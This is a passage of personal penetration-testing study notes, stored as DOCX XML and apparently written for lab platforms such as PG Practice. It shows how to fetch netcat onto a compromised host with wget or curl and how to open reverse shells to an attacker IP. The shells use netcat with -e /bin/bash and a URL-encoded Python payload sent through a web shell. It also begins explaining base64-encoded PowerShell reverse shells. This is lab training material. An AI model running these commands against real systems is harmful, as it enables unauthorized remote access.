    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010E7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This down below also was used in </w:t>
      </w:r>
      <w:hyperlink r:id="rId336">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Cockpit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010E8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="390"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Host nc (or any reverse shell payload) on Python server from Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="390"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can use the built-in netcat already on Kali.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="390"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start the HTTP server to host the binary:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="390"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -m http.server 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010ED">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="390"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On the Linux webshell, run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="390"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use wget or curl to download nc:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="390"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget http://192.168.118.4/nc -O /tmp/nc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="390"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x /tmp/nc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="390"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If this you are able to successfully upload to /tmp but the shell doesn't trigger, then try moving it to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/shm</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, since it's usually accessible by everyone, even www-data. We had to use this instead of /tmp in Relia Challenge Lab .246</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="390"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This downloads the nc binary to /tmp/ and makes it executable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="390"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You could also use curl:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="390"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -o /tmp/nc http://192.168.118.4/nc &amp;&amp; chmod +x /tmp/nc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="569"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Change it to</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /dev/shm</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> if needed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010F7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="390"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then use that /tmp/nc you just downloaded to connect back to Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="390"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run the reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="390"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/nc 192.168.118.4 4446 -e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="390"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Change it to</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /dev/shm</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> if needed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="390"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This sends a reverse shell from the Linux machine to your Kali listener on port 4446.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010FD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010FE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tket63w5ceja" w:id="138"/>
      <w:bookmarkEnd w:id="138"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using python</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010FF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001100">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this </w:t>
      </w:r>
      <w:hyperlink r:id="rId337">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Nukem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice, they got a PHP web shell. And then they enumerated Python version. And then they used a python rev shell (with URL encode) to get a reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001101">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="406"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?cmd=id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001102">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="406"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?cmd=python3%20--version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001103">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="406"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.45.181%22,80));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22bash%22)%27</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001104">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000110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06">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001107">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wvn69iwdc2u1" w:id="139"/>
      <w:bookmarkEnd w:id="139"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Encoding Reverse Shells in Base64 for powershell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001108">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Umbraco </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">section of the AD Pen Testing notes, we used the already Base64 encoded powershell rev shell from revshells.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001109">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000110A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000110B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From XXXXXXXXX (9.3.1. Using Executable Files)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000110C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000110D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's use a PowerShell one-liner for our reverse shell. Since there are several special characters in the reverse shell one-liner, we will encode the string with base64. We can use PowerShell or an online converter(https://www.base64encode.org/) to perform the encoding.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000110E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000110F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this demonstration, we'll use PowerShell on our Kali machine to encode the reverse shell one-liner. First, let's create the variable $Text, which will be used for storing the reverse shell one-liner as a string. Then, we can use the method convert and the property Unicode from the class Encoding to encode the contents of the $Text variable.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001110">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="5257800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="332" name="image320.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image320.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId338"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="5257800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001111">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001112">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As shown in Listing 33, the $EncodedText variable contains the encoded reverse shell one-liner. Let's use curl to execute the encoded one-liner via the uploaded simple-backdoor.pHP. We can add the base64 encoded string for the powershell command using the -enc parameter. We'll also need to use URL encoding for the spaces.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001113">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
